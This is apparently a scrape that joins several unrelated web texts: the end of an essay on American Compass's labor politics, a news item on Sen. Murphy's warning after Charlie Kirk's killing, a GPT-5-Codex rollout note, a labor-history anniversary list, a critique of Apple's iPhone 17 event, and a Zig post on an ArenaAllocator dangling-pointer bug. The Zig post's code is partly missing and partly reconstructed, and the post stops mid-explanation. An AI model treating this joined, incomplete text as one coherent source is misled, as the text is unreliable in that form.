In the early 2000s, Rolf presided over Local 775’s successful organizing campaign among nursing-home workers in the Seattle area, one driven almost entirely by top-down negotiations with employers.
24
Rolf’s model of organizing dovetails with the kind of conservative labor movement envisioned by American Compass, one devoid of strikes or political mobilization. Rolf’s success bringing nursing home operators to the table came through establishing a miniature version of the “sectoral bargaining” common to Western Europe whereby tripartite institutions negotiate wages and benefits across entire industries or regions. In a friendly public debate with Rolf, Cass remained skeptical of sectoral bargaining, because it reminded him of the industry-wide “pattern bargaining” between the United Automobile Workers and the Big Three that he believes doomed the domestic auto industry (and that historians have identified as a crucial part of the mid-century movement for building an American social democracy).
25
American Compass’ congressional allies are attempting to find ways to increase workers’ bargaining power without rebuilding a labor movement capable of leveraging contract negotiations with some of the world’s largest corporations into political action. Following Trump’s reelection, Missouri Senator Josh Hawley introduced the Faster Labor Contracts Act to force employers to agree to a contract within ninety days of workers winning union recognition. Hawley’s bill is endorsed by the Teamsters and co-sponsored by Democrats Cory Booker (NJ), Gary Peters (MI), and Jeff Merkley (OR).
26
Hawley’s bill directly confronts the management stonewalling that ultimately beat back the big private-sector organizing wins of the 1970s. Yet the very language of the Faster Labor Contracts Act does not address the many other antiunion tactics that employers have developed over the last half century to keep workers from even having their union recognized.
27
Thus, American Compass’ vision of pro-worker labor law reform remains torn between giving workers a “seat at the table” but without threatening managerial prerogatives over the workplace or in politics.
Targeting Workers, “Tightening” Labor Markets
To square the circle of how to improve the working conditions and living standards of workers without wholly alienating employers and investors, American Compass falls back on the “populist nationalism” long championed by Steve Bannon and that still resonates in the broader Trumpist coalition. It is that organized xenophobia driving Trump’s promise to execute mass deportations by masked federal agents supported by active service military personnel and the courts. This terror has many uses, but one is to accomplish a reversal in the declining fortunes of the “American Worker.” As political scientist Benjamin Braun and economist Cédric Durand point out, Trump’s electoral base after his 2024 win now “expects rising living standards and secure jobs delivered via a tariff-led revival of U.S. manufacturing and a deportation-led tightening of the labor market.”
28
Delivering on those promises without further agitating globally oriented financial markets, not to mention industries dependent on immigrant labor, is its own incredibly tenuous balancing act. At this tense inflection point, American Compass provides the policy language for how to translate mass deportations into raises for a nativist working class.
For American Compass, instituting mandatory E-Verify to severely punish employers who hire undocumented workers offers “one simple trick” to force employers to abandon “cheap labor.” By aggressively policing workplaces and imposing “catastrophic and criminal penalties” on firms who routinely hire undocumented labor, American Compass argues, U.S. employers will confront a “tight labor market,” especially in service and manual labor jobs, and thus will have no choice but to hire documented workers and pay them what they consider fair wages.
29
“Rather than lament all the ‘jobs Americans won’t do,’ which exist only because the law provides non-Americans to do them, policymakers should leave employers no choice but to create jobs Americans will do.”
30
This argument belies the ways that this kind of anti-immigrant policing empowers capital on the job by providing new technologies and capacities for the Department of Homeland Security to (re)classify those who have standing as citizen-workers. Imposing mandatory E-Verify procedures threatens to eliminate not only any remaining vestiges of New Deal–era industrial citizenship but also the protections of political citizenship for working people. As the political scientist Michael Macshler warns, “workplace enforcement complements rather than contradicts the larger project of making labor into a malleable and cheap commodity.” The sections of the Heritage Foundation’s Project 2025 “Mandate for Leadership” co-authored by Cass, calling for “a more cooperative model run jointly with management that focuses solely on workplace issues,” overlap with specific proposals to eviscerate or render meaningless a whole sweep of labor and workplace regulations and protections. “It may be that the undocumented worker is not a relic of the past, but a model for the future in which all workers are expendable, perhaps even deportable, with no protections whatsoever.”
31
This could provide the opening to leverage state police power against not only the unorganized but also the organized.
Building a Conservative Labor Movement
American Compass’ vision for building a “conservative labor movement” challenges many of the right’s long-held assumptions about the proper relations of power on the job in the United States. Only by giving workers a “seat at the table,” Cass, his colleagues, and supporters argue, can the country reverse decades of wage stagnation and restore the efficiency of domestic production, strengthen national security, and rebuild the nuclear family. American Compass’ labor and social policy program suggests a way to plan for a nativist working-class nationalism, even as it navigates the contradictions of achieving this within the coalitional and institutional bounds of Trump’s Republican Party. Reading between the lines of American Compass’ program also betrays a nervousness about the capacity of the right’s extant policy program to contain the percolating militancy of workers hard-pressed by decades of wage stagnation and austerity. It is imperative that working people and their organizations find ways to exploit those tensions, rather than buy into their false promises, to confront the authoritarian drift we now find ourselves in.
Notes
Gabriel Winant, “Exit Right: Moving beyond Corporate Democrats after Trump’s Election,”
LAWCHA Newsletter
(Winter 2025): 7-8.
See Marissa Chappel,
The War on Welfare: Family, Poverty, and Politics in Modern America
(Philadelphia: University of Pennsylvania Press, 2010); Chip Berlet and Matthew N. Lyons,
Right-Wing Populism in America: Too Close for Comfort
(New York: Guildford, 2016); Daniel Martinez HoSang and Joseph E. Lowndes,
Producers, Parasites, Patriots: Race and the New Right-Wing Politics of Precarity
(Minneapolis: University of Minnesota Press, 2019).
On Nixon’s FAP, see Robert O. Self,
All in the Family: The Realignment of American Democracy since the 1960s
(New York: Hill and Wang, 2012), 17-46.
Jill Quadagno, “Race, Class, and Gender in the U.S. Welfare State: Nixon’s Failed Family Assistance Plan,”
American Sociological Review
55, no. 1 (February 1990): 11-28.
See Michal Kalecki, “Political Aspects of Full Employment,”
The Political Quarterly
14, no. 4 (1943): 326.
Following the lead of his SEIU mentor Andy Stern, Rolf eschewed any kind of direct action on the job, instead focusing the campaign on convincing nursing-home operators to accept union representation in select facilities across the region by promising to lobby for increased state Medicaid reimbursements to cover the costs of pay raises and to restrict future bargaining from challenging existing managerial rules in the workplace. The result dramatically increased union representation, but as the late organizer-intellectual Jane McAlevey observed, it excluded nursing-home workers from a say over their working conditions and, over the next fifteen years, they had “achieved little more than their nonunion counterparts” in terms of pay and benefits. Jane F. McAlevey,
No Shortcuts: Organizing for Power in the New Gilded Age
(New York: Oxford University Press, 2016), 78-84.
Oren Cass, “Sectoral Bargaining’s Promise and Peril,”
American Compass
, September 14, 2020, available at
https://americancompass.org/sectoral-bargainings-promise-and-peril/
. On the UAW’s social democracy, see Nelson Lichtenstein,
Walter Reuther: The Most Dangerous Man in Detroit
(Urbana: University of Illinois Press, 1997), 271-98.
See Lane Windham,
Knocking on Labor’s Door: Union Organizing in the 1970s and the Roots of a New Economic Divide
(Chapel Hill: University of North Carolina Press, 2017), 57-82.
Kristoffer Smemo
teaches Labor Studies and is on staff at the UCLA Institute for Research on Labor & Employment. His research explores labor politics and public policy in the United States, and he is the author of
Making Republicans Liberal: Social Struggle and the Politics of Compromise
, University of Pennsylvania Press, 2024.
‘Something Dark Might Be Coming’: Senator Rebukes Right’s Weaponization of Kirk Murder To ‘Destroy Dissent’
Portside
portside.org
2025-09-16 02:18:38
‘Something Dark Might Be Coming’: Senator Rebukes Right’s Weaponization of Kirk Murder To ‘Destroy Dissent’
Mark Brody
Mon, 09/15/2025 - 21:18
...
‘Something Dark Might Be Coming’: Senator Rebukes Right’s Weaponization of Kirk Murder To ‘Destroy Dissent’
Sen. Chris Murphy (D-Conn.) (AP Photo/Jacquelyn Martin, File)
A Democratic US senator over the weekend issued an ominous warning about Republicans using the murder of
Charlie Kirk
as a pretense to clamp down on political speech.
In a lengthy social media post on Sunday, Sen. Chris Murphy (D-Conn.)
outlined
how President
Donald Trump
and his allies look set to wage a campaign of retribution against political adversaries by framing them as accomplices in Kirk’s murder.
“Pay attention,” he began. “Something dark might be coming. The murder of Charlie Kirk could have united Americans to confront political violence. Instead, Trump and his anti-democratic radicals look to be readying a campaign to destroy dissent.”
Murphy then contrasted the recent statements by Republican Utah Gov. Spencer Cox, who accurately stated that political violence is not confined to a single political ideology, with those of Trump and his allies, who have said such violence is only a problem on the left.
Murphy highlighted a statement from Trump ally and informal
adviser
Laura Loomer, who
said
that she wanted “Trump to be the ‘dictator’ the left thinks he is” and that she wanted “the right to be as devoted to locking up and silencing our violent political enemies as they pretend we are.”
He then pointed to Trump saying that progressive billionaire financier George Soros should face racketeering charges even though there is no evidence linking Soros to Kirk’s murder or any other kind of political violence.
“The Trump/Loomer/Miller narrative that Dems are cheering Kirk’s murder or that left groups are fomenting violence is also made up,” he added. “There are always going to be online trolls, but Dem leaders are united (as opposed to Trump who continues to cheer the January 6 violence).”
Murphy claimed that the president and his allies have long been seeking a “pretext to destroy their opposition” and that Kirk’s murder gave them an opening.
“That’s why it was so important for Trump sycophants to take over the DoJ and FBI, so that if a pretext arose, Trump could orchestrate a dizzying campaign to shut down political opposition groups and lock up or harass its leaders,” he said. “This is what could be coming—now.”
Early in his second term, the president
fired
FBI prosecutors who were involved in an earlier political violence case—the prosecution of people involved in the violent attack on the US Capitol on January 6, 2021 by Trump supporters who aimed to stop the certification of the 2020 election.
A top ethics official and a lawyer who spoke out against the president’s anti-immigration policy are among those who have been
fired
from the DOJ.
Murphy ended his post with a call for action from supporters.
“I hope I’m wrong. But we need to be prepared if I’m right,” he said. “That means everyone who cares about democracy has to join the fight—right now. Join a mobilization or protest group. Start showing up to actions more. Write a check to a progressive media operation.”
One day after Murphy’s warning, columnist Karen Attiah
announced
that she had been fired from the
Washington Post
over social media posts in the wake of Kirk’s death that were critical of his legacy but in no way endorsed or celebrated any form of political violence.
“The
Post
accused my measured Bluesky posts of being ‘unacceptable,’ ‘gross misconduct,’ and of endangering the physical safety of colleagues—charges without evidence, which I reject completely as false,” she explained. “They rushed to fire me without even a conversation. This was not only a hasty overreach, but a violation of the very standards of journalistic fairness and rigor the
Post
claims to uphold.”
OpenAI is rolling out the GPT-5 Codex model to all Codex instances, including Terminal, IDE extension, and Codex Web (chatgpt.com/codex).
Codex is an AI agent that allows you to automate coding-related tasks. You can delegate your complex tasks to Codex and watch it execute code for you.
Codex (Source: BleepingComputer.com)
Even if you don't know programming languages, you can use Codex to "vibe code" your apps and web apps.
But so far, it has fallen a bit short of Claude Code, which is the market leader in the AI coding space.
Today, OpenAI confirmed it's rolling out GPT-5-Codex, a version of GPT-5 optimized for Codex.
In a
blog post
, OpenAI stated the GPT-5 Codex model excels in real-world coding tasks, achieving a 74.5% success rate on the SWE-bench Verified benchmark.
In code refactoring evaluations, it improved from 33.9% with GPT-5 to 51.3% with GPT-5-Codex.
GPT-5-Codex is still rolling out. I don't see it on my Terminal yet, even though I pay for ChatGPT Plus ($20).
OpenAI says it will be fully rolled out to everyone in the coming days.
SEPTEMBER 17 IS THE 110TH ANNIVERSARY
of Haiti’s government bowing to overwhelming military and economic pressure and signing a treaty – the Haitian-American Convention of 1915 – that gave the U.S. complete control of Haiti’s financial and government administration for the next 10 years.
Already occupied by U.S. Marines, who had forcibly removed all of the Haitian government’s gold reserve, Haiti faced a choice between a U.S. occupation that could last indefinitely and one that would, according to the U.S., end after 10 years. Even that agreement was broken by the U.S., which did not end its military occupation until 1934.
https://portside.org/2015-08-01/100-years-after-invasion-humanitarian-occupation-haiti
Slavers Flex Their Political Muscle
SEPTEMBER 18 IS THE 175TH ANNIVERSARY
of the signing of the Fugitive Slave Act of 1850 by U.S. President Millard Fillmore. The 1850 law was a much more draconian version of the existing Fugitive Slave Act of 1793.
The 1850 law greatly strengthened the enforcement powers of both officials and of slave-catchers over anyone they accused of having escaped slavery, at the same time it eliminated almost all of the legal defenses that an accused fugitive could invoke.
https://archive.org/details/slavecatchersenf0000camp/page/n3/mode/2up
Decades of Struggle Wins in the End
SEPTEMBER 19 IS THE 90TH ANNIVERSARY
of an event that is an inspiring reminder that the struggle to protect the environment can be won, no matter how long and difficult it may be.
In 1935, the federal government began the construction of a planned 107-mile barge canal across Florida to connect Jacksonville on the Atlantic Ocean and Inglis on the Gulf of Mexico. Environmentalists' opposition to the project was intense because the planned route would have threatened the state's supply of fresh water and destroyed or compromised many sensitive subtropical ecosystems.
Construction proceeded slowly and with long interruptions until 1971 when, with the canal one-third completed, a lawsuit by the Environmental Defense Fund and Florida Defenders of the Environment resulted in a preliminary injunction. Four days later Richard Nixon ordered an end to the project.
Part of the route of the unfinished canal is now the Marjorie Harris Carr Cross Florida Greenway, named to honor one of the leaders of the effort to stop the canal.
https://www.nrc.gov/docs/ML1204/ML12044A397.pdf
Racial Justice Doesn’t Come Easy
SEPTEMBER 20 IS THE 50TH ANNIVERSARY
of Florida’s governor pardoning two inmates on death row, Freddie Lee Pitts and Wilbert Lee, for a murder they did not commit. The two had already served more than 12 years in prison.
Pitts and Lee, both young Black men who were accused of having murdered two white gas station workers, appealed their convictions multiple times. Their efforts to obtain justice gained momentum three years after they were first convicted, when a man with no connection to Pitts and Lee confessed to having committed the murders.
Pitts and Lee eventually succeeded in winning the right to a new trial, but they were both convicted again, because the trial judge refused to admit any evidence concerning the third man’s admission of guilt.
Pitts and Lee might have been executed or spent the rest of their lives in prison had it not been for more than eight years of reporting on their case by Gene Miller, a reporter for the Miami Herald. Miller’s reporting convinced Florida governor Rubin Askew to investigate the case, with the result that Askew became convinced of their innocence. Saying that “the evidence which was not available at the trial and is now available is conclusive. These men are not guilty,” Askew pardoned them.
SEPTEMBER 21 IS THE 86TH ANNIVERSARY
of a very early example of a successful lunch-counter sit-in demonstration.
Cafeteria Employees Union Local 302 was on strike against Shack Sandwich Shops in New York City. The union was demanding a closed shop, an end to the employer’s racially discriminatory treatment of the workforce, a 48-hour week, and a very substantial wage increase.
After seven weeks on strike, on September 21, 1939, about a hundred supporters of the union occupied all the seats at one of the struck shops and refused to leave. After sporadic sit-downs continued for more than three weeks, the union and the employer agreed to a contract that substantially satisfied all of the union’s demands.
https://labortribune.com/opinion-dos-and-donts-of-supporting-a-strike/
‘We Believe in Farmers’
SEPTEMBER 22 IS THE 40TH ANNIVERSARY
of the first Farm Aid benefit concert, which took place in 1985 in Champaign, Illinois, in front of some 80,000 people.
Performers included The Beach Boys, Jimmy Buffett, Glen Campbell, Johnny Cash, John Denver, Bob Dylan, Arlo Guthrie, Merle Haggard, Emmylou Harris, Waylon Jennings, Billy Joel, B.B. King, Carole King, Kris Kristofferson, Loretta Lynn, Randy Newman, Joni Mitchell, Willie Nelson, Roy Orbison, Tom Petty, Bonnie Raitt, Lou Reed, Kenny Rogers, Sissy Spacek, and Neil Young; the concert raised $9 million for the benefit of family farmers facing foreclosure.
Additional Farm Aid benefits have taken place almost annually before huge audiences in venues all over the country, from Connecticut to Washington State, and from Minnesota to Texas. This year’s concert will take place in Minneapolis, Minnesota, on September 20. For tickets to this week’s event and much more information about Farm Aid, visit
https://www.farmaid.org/
Jim Crow Justice for Emmett Till’s Murderers
SEPTEMBER 23 IS THE 70TH ANNIVERSARY
of an all-white jury’s acquittal of Emmett Till’s murderers in Sumner, Mississippi. For a summary of the trial, visit the Equal Justice Initiative’s
https://calendar.eji.org/racial-injustice/sep/23
A first version of this piece was almost ready to be published two days ago, but after writing more than 2,000 words I grew increasingly angry and exasperated, and the article became too meandering and rant-like. So I deleted everything and started afresh several hours later.
This, of course, is about
Awe-dropping
, Apple’s September 9 event, where they presented the new iPhone lineup, the new AirPods Pro, and the new Apple Watches. And the honest truth here is that I’m becoming less and less inclined to talk about Apple, because it’s a company that I feel has lost its alignment with me and other long-time Apple users and customers.
The more Apple talks and moves like other big tech companies, the less special it gets; the less special and distinctive it gets, the less I’m interested in finding ways to talk about it. Yes, I have admitted that Apple makes me mad lately, so they still elicit a response that isn’t utter indifference on my part. And yes, you could argue that if Apple makes me mad, it means that in the end I still care.
But things aren’t this clear-cut. I currently don’t really care about Apple — I care that their bad software design decisions and their constant user-interface dumbing down may become trends and get picked up by other tech companies. So, what I still care about that’s related to Apple is essentially the consequences of their actions.
The Steve Jobs quote
The event kicked off with the famous Steve Jobs quote,
Design is not just what it looks like and feels like. Design is how it works.
and I immediately felt the whiplash.
Why that quote? Why now, after months of criticism towards the new design æsthetic of Liquid Glass? I gave this choice three possible interpretations — I still may be missing something here; I’m sure my readers will let me know.
It’s Apple’s way of trolling the critics, who have repeatedly resorted to Steve Jobs’s words to criticise the several misguided UI choices in Liquid Glass. It’s the same kind of response as Phil Schiller famously blurting,
Can’t innovate anymore, my ass!
in 2013 during the presentation of the then-redesigned Mac Pro. But it feels like a less genuine, more passive-aggressive response (if this is the way we’re supposed to read their use of that quote).
Apple used the quote in earnest. As in, they really believe that what they’re doing is in line with Jobs’s words. If that’s the case, this is utter self-deception. The quote doesn’t reflect at all what Apple is doing in the UI and software department — the Liquid Glass design is more ‘look & feel’ than ‘work’. And the very introduction of the iPhone Air proves that Jobs’s words are falling on deaf ears on the hardware front as well.
Apple used the quote ‘for effect’. As if Meta started a keynote by saying,
Our mission is to connect people, no more no less.
You know, something that makes you sound great and noble, but not necessarily something you truly believe (or something that is actually true, for that matter).
I can’t know for sure which of these might be the correct interpretation. I think it heavily depends on whose Apple executive came up with the idea. Whatever the case may be, the effect was the same — it felt really jarring and tone-deaf.
AirPods and Watches
If you’re not new here, you’ll know that these are the Apple products I care about the least, together with HomePods and Apple TV. I always tune out when Apple presents these, so if you want details, browse Apple’s website or go read the technical breakdowns elsewhere. Personally, I’m too into traditional horology, and therefore the design of the Apple Watch has always felt unimaginative at best, and plain ugly at worst.
From a UI standpoint, the Apple Watch continues to feel too complicated to use, and too overburdened with features. I wouldn’t say it’s design by committee, but more like designed to appeal to a whole committee. Apple wants the watch to appeal to a wide range of customers, therefore this little device comes stuffed with all kinds of bells and whistles. As I said more than once, the real feature I would love to see implemented is the ability to just turn off entire feature sets, so that if you only want to use it as a step counter and heart rate monitor, you can tell the watch to be just that; this would be more than just having a watchface that shows you time, steps, heart rate — it would be like having a watch that does
only that
. With all the features you deem unnecessary effectively disabled, imagine how much simpler interacting with it would be, and how much longer its battery life would last.
What really got on my nerves during the Apple Watch segment of the event, though, is this: Apple always,
always
inserts a montage of sob stories about how the Apple Watch has saved lives, and what an indispensable life-saving device it is. Don’t get me wrong, I’m glad those lives were saved. But this kind of ‘showcase’ every year is in such poor taste. It’s clear to me that it’s all marketing above everything else, that they just want to sell the product, and these people’s stories end up being used as a marketing tactic. It’s depressing.
As for the AirPods, and true wireless earbuds in general, I find this product category to be the most wasteful. Unless someone comes up with a type of earbuds that have easily replaceable batteries, I’m not interested in buying something that’s bound to become e‑waste in a relatively short period of time.
The new iPhones
Don’t buy them. Don’t waste your money, unless you have money to waste and don’t care about a company with this kind of leadership. Read
How Tim Cook sold out Steve Jobs
by Anil Dash to understand how I feel. I couldn’t have said it better myself.
I’d wrap up my article here, but then I’d receive a lot of emails asking me why I didn’t talk about the iPhones, so here are a few stray observations:
One, maybe involuntary, user-friendly move Apple made with this new iPhone lineup is that we now have three very distinct iPhone models, whose nature and price should really help people decide which to purchase.
The regular
iPhone 17
is the safe, iterative solution. It looks like an iPhone 16, and it works like an iPhone 16 with better features. It’s the ideal phone for the average user (tech-savvy or not). It’s the safe choice and the best-value iPhone overall.
The
iPhone 17 Pro
is possibly the most Pro iPhone to date. During its presentation, I felt like Apple wants you to consider this more like a pro camera for videographers and filmmakers rather than just a smartphone with a good camera array. People who have no use for all these pro video recording features shouldn’t waste their money on it. Unless they want a big chunky iPhone with the best camera array and/or have money to burn. In my country (Spain), the 6.3‑inch iPhone 17 Pro starts at €1,319 with 256GB of storage, and goes up to €1,819 with 1TB of storage. For the bigger iPhone 17 Pro, those prices become €1,469 and €1,969 respectively, and if you want the iPhone 17 Pro Max with 2TB of storage, it’ll cost you €2,469. You do you, but I think these are insane prices for phones (and SSDs).
The
iPhone Air
is just… odd. I was curious to know about other techies’ reactions, and of all the major tech YouTubers, the one whose first impressions of the iPhone Air I agree with most is Marques Brownlee.
At this point
in his video, he says:
I really think this phone is gonna be a hard sell, because if you subtract emotions from it, it’s just… the worst one. This is gonna jump in the lineup at $999 — it replaces essentially the Plus phones in the lineup — and it is surrounded by other iPhones that are better than it in basically every way, other than being super thin and light. So it’s a fascinating gamble.
This phone has the same A19 Pro chip in it as the Pro phones, minus one GPU core. Interesting choice: apparently it’s a bit more efficient than the base A19, so that’s good for battery life. But we also just heard a whole long list of choices Apple made with the Pro phones to make them more thermally efficient to not overheat — switching from titanium to aluminium, and adding a vapour chamber to the back. But this phone is
still
titanium, and absolutely does not have room for an advanced thermal solution or any sort of vapour chamber, so it sounds like this phone could get much hotter and throttle performance much quicker. It’s a red flag.
Now we also know that ultra-thin phones have a tendency to be a little bit less durable. They’ve bent over the years. And I’m not gonna be the first one to point this out. […] And Apple of course has thought about this. They’ve for sure tested this, and they’re telling us it’s the most durable iPhone ever. But, I mean, I’m looking at the phone and I think it qualifies also as a red flag. And then we already know there is just no way battery life can be good on this phone, right? There’s just no way. I’ve been reviewing phones for more than a decade, and all signs point to it being trash.
There was a slide in the keynote today about how they were still proud to achieve ‘all-day battery life’. But, like, come on. Really? I mean they still do the thing where they rearranged the components up into the little plateau at the top to make room for more battery at the bottom. But there’s just absolutely not enough room in this phone for a large battery. And it doesn’t appear to be silicon-carbon, or any sort of a special ultra-high density battery.
And Apple also announced it alongside a special dedicated MagSafe battery accessory, just for this phone, that adds 3,149 mAh, and just barely, combined, will match the 17 Pro in terms of quoted video playback. So if that doesn’t scream red flag, I don’t know what to tell you.
It is also e‑SIM-only, globally, ’cause there’s no room in any version of this phone for a plastic SIM card. There’s also no millimeter-wave 5G. And like I said, it’s coming in at $1,000, which is more expensive than the base iPhone, which will have a better camera system, and better battery life, and may overheat less.
So look, I think there’s two ways to look at this phone. This is either Apple just throwing something new at the wall and seeing if it sticks. […] Or you can see this as a visionary, long-time-in-the-making preview at the future of all phones. Like, maybe someday in the future every phone will be this thin. And Apple is just now, today, getting the tech together with the battery and display and modem and Apple Silicon to make this phone possible. Maybe kind of like how the first MacBook Air sucked, and was underpowered, but then eventually all laptops became that thin. Maybe that’s also what’s gonna happen to smartphones. And maybe the same way Samsung made the ultra-thin S25 Edge, and then a few months later they came out with their super-thin foldable, the Z Fold7, and I felt like the Edge phone was one half of that foldable. Maybe that’s also what Apple’s doing. Maybe we’re gonna see an ultra-thin foldable iPhone next year. Maybe.
Yeah, I’m firmly in the “Apple throwing something new at the wall and seeing if it sticks” camp. Because what’s so innovative about thin smartphones? What’s the usefulness when the other two dimensions keep increasing? Making a thin and light and relatively compact MacBook and calling it ‘Air’ made sense back when virtually no other laptop was that thin and light. It was, and is, a great solution for when you’re out and about or travelling, and space is at a premium; and you also don’t want a bulky computer to lug around.
Then Apple applied the ‘Air’ moniker to the iPad, and that started to make less sense. It’s not as if the regular or Pro iPad was ever that cumbersome to begin with. And then Apple felt the need to have MacBook Airs that are 13 and 15 inches in size, instead of 11 and 13. A 15-inch MacBook Air makes little sense, too, as an ‘Air’ laptop. It may be somewhat thin, somewhat light, but it’s not exactly compact.
And now we have the iPhone Air — which is just thin for thinness’ sake. It’s still a big 6.5‑inch phone that’s hardly pocketable. I still happen to handle and use a few older iPhones in the household, and the dimensions of the iPhone 5/5S/SE make those models more ‘Air’ than the iPhone Air. If you want a slightly more recent example, the iPhone 12 mini and 13 mini have the real
lightness
that could make sense in a phone. Perhaps you’ll once again remind me that the iPhone 12 mini and 13 mini weren’t a success, but I keep finding people telling me they would favour a more compact phone than a big-but-thin phone. I’ll be truly surprised if the iPhone Air turns out to be a bigger success than the ‘mini’ iPhones. It is a striking device in person, no doubt, but once this first impact is gone and you start thinking it over and making your decision, what Marques Brownlee said above is kind of hard to deny.
I find particularly hilarious the whole MagSafe battery accessory affair. Apple creates a super-thin, super-light phone, proudly showcases its striking design, and immediately neutralises this bold move and thin design by offering an accessory 1) that you’ll clearly need if you want to have a decently-lasting battery (thus admitting that that thinness certainly came with an important compromise); and 2) that instantly defeats the purpose of a thin design by returning the bulk that was shaved away in making the phone.
What should I be in awe of?
I found a lot of reactions to these products to be weirdly optimistic. Either I’m becoming more cynical with age and general tech fatigue, or certain people are easily impressed. What usually impresses me is some technological breakthrough I didn’t see coming, or a clever new device, or some clever system software features and applications that give new purposes to a device I’ve known well for a while. This event, and what was presented, didn’t show any of this.
Didn’t you expect Apple to be able to produce yet another iteration of Apple Watches and AirPods that were better than the previous one? Didn’t you expect Apple to be able to make a unibody iPhone after years of making unibody computers? Didn’t you expect Apple to be able to have iPhones with better cameras and recording capabilities than last year’s iPhones? Didn’t you expect Apple to be able to make a thinner iPhone? To come up with better chips? Or a vapour chamber to prevent overheating? Or a ‘centre stage’ feature for the selfie camera? Are these things I should be in awe of?
I will probably be genuinely amazed when Apple is finally able to come up with a solution that entirely removes the dynamic island from the front of the iPhone while still having a front-facing camera up there.
I’ll be similarly amazed when Apple finally gets rid of people who have shown they know very little about software design and user interfaces, and comes up with operating systems that are, once again, intuitive, discoverable, easy to use, and that both look and work well. Because the iOS, iPadOS, and Mac OS 26 releases are not it — and these new iPhones might be awe-inspiring all you want, but you’ll still have to deal with iOS 26 on them. These new iPhones may have fantastic hardware and all, but what makes any hardware tick is the software. You’ve probably heard that famous quote by Alan Kay, “People who are really serious about software should make their own hardware”. Steve Jobs himself quoted it, adding that “this is how we feel about it” at his Apple. Today’s Apple needs to hear a revised version of that quote, something like, “People who are this serious about their hardware should make better software for it”.
The level of good-enough-ism Apple has reached today in software is downright baffling. This widening gap between their hardware and software competence is going to be really damaging if the course isn’t corrected. The tight integration between hardware and software has always been what made Apple platforms stand out. This integration is going to get lost if Apple keeps having wizards for hardware engineers on one side, and software and UI people producing amateurish results on the other side. Relying on legacy and unquestioning fanpeople, for whom everything Apple does is good and awesome and there’s nothing wrong with it, can only go so far. Steve Jobs always knew that software is comparatively more important than the hardware. In a 1994 interview with Jeff Goodell, published by Rolling Stone in 2010 (archived link), Jobs said:
The problem is, in hardware you can’t build a computer that’s twice as good as anyone else’s anymore. Too many people know how to do it. You’re lucky if you can do one that’s one and a third times better or one and a half times better. And then it’s only six months before everybody else catches up. But you can do it in software.
But not if you keep crippling it because you want to bring all your major platforms to the lowest common denominator.
A bug was recently reported in pg.zig which was the result of a dangling pointer to an ArenaAllocator (1). This amused me since (a) I write a lot about dangling pointers, (b) I write a bit about ArenaAllocators, and (c) it isn't the first time I've messed this up.
Overview
If we go back to basics, in Zig dangling pointers and segfaults we started off with an easy-to-understand demonstration of a dangling pointer which boiled down to this function:
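(The code block didn't survive in this copy; based on the description that follows and the variant shown below, the function was presumably along these lines:)

fn powerLevel(over: i32) ![]u8 {
    var buf: [20]u8 = undefined;
    // buf lives on this function's stack, so the returned slice dangles
    return std.fmt.bufPrint(&buf, "over {d}!!!", .{over});
}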
bufPrint writes the formatted string into buf and returns a slice into buf containing the formatted string (or an error if buf isn't big enough). It might help if we imagine that bufPrint returns the length of the formatted string and adjust our code accordingly:
fn powerLevel(over: i32) ![]u8 {
    var buf: [20]u8 = undefined;
    // If bufPrint returned the length of the formatted string
    // rather than a slice of buf
    const n = try std.fmt.bufPrint(&buf, "over {d}!!!", .{over});
    return buf[0..n];
}
Now if you're new to Zig, you might be surprised to find out that, while the above is invalid, this is completely fine:
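(The code block is missing here as well; the "completely fine" version, reconstructed from the explanation below, returns the array by value rather than a slice into it:)

fn powerLevel(over: i32) ![20]u8 {
    var buf: [20]u8 = undefined;
    // the returned slice is discarded; the whole array is copied out
    _ = try std.fmt.bufPrint(&buf, "over {d}!!!", .{over});
    return buf;
}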
In Zig, assignments, including return values, are always copies. In the above two examples, and in the actual bug that we'll cover shortly, it all comes down to understanding what it is we are copying. In the first case, we're returning a slice and in the second case, an array. A slice is a length and a pointer to an array. It's that level of indirection that causes the issue. When you return the slice, you're returning a copy of the length (which is fine) and the pointer. That pointer is an address, but, in powerLevel, it's an address which stops being valid when the function returns.

With the array, there is no indirection. We're not returning an address of the array, we're returning the array itself. If we changed the function return type to []u8 and then did return &buf;, we'd be in trouble again, as now we'd be returning an address which will become invalid.
What does all this have to do with ArenaAllocators?
ArenaAllocator
The issue found in pg.zig can be simulated by a trivial example:
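(The example itself was lost in this copy; from the description that follows, it would have looked roughly like this:)

const std = @import("std");
const Allocator = std.mem.Allocator;
const ArenaAllocator = std.heap.ArenaAllocator;

const User = struct {
    name: []const u8,
    arena: ArenaAllocator,

    fn init(allocator: Allocator, name: []const u8) !User {
        var arena = ArenaAllocator.init(allocator);
        return .{
            .arena = arena,
            .name = try arena.allocator().dupe(u8, name),
        };
    }

    fn deinit(self: *User) void {
        self.arena.deinit();
    }
};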
Our User has a name and, reasonably, in init we clone the name to ensure that it lives for as long as the user (otherwise, the caller would need to make sure the name passed into init is valid for as long as the returned user). It's a bit premature, but we create an arena to manage any allocations associated with the user. This makes our user.deinit method simple: clear the arena.
Unfortunately, even if user.deinit() is called, this code has a memory leak. If we take the above struct and try to use it in a program, we'll be told that user.name is leaking despite arena.deinit being called:
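(A minimal driver, reconstructed for illustration; the name passed in is arbitrary:)

pub fn main() !void {
    var gpa = std.heap.GeneralPurposeAllocator(.{}){};
    defer _ = gpa.deinit(); // reports the leaked user.name on exit
    var user = try User.init(gpa.allocator(), "Leto");
    defer user.deinit();
    std.debug.print("{s}\n", .{user.name});
}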
Can you tell what's going on? Here's a hint: if we make a small change to our User.init, the leak goes away:
fn init(allocator: Allocator, name: []const u8) !User {
    var arena = ArenaAllocator.init(allocator);
    return .{
        // the order has been swapped
        .name = try arena.allocator().dupe(u8, name),
        .arena = arena,
    };
}
I think this is the type of bug that some people will see right away and consider obvious. But for me, even looking at this code, specifically designed around the issue, I find it subtle. Why is one version right and the other one wrong? To answer that, we need to understand what an ArenaAllocator is (not how it works).
std.heap.ArenaAllocator is a structure with two fields:
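(Trimmed to the two fields in question; the actual std definition has more to it:)

pub const ArenaAllocator = struct {
    child_allocator: Allocator,
    state: State,
    // ...
};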
What Zig calls the "child_allocator", I would call the "parent_allocator", but either way, this is the allocator passed into init. The structure could be simplified by directly storing the state:
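(A sketch of that simplification, storing only the state in our User:)

const User = struct {
    name: []const u8,
    arena_state: ArenaAllocator.State,

    fn deinit(self: *User, allocator: Allocator) void {
        // promote the state back into a full ArenaAllocator by
        // supplying the same allocator that was passed to init
        self.arena_state.promote(allocator).deinit();
    }
};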
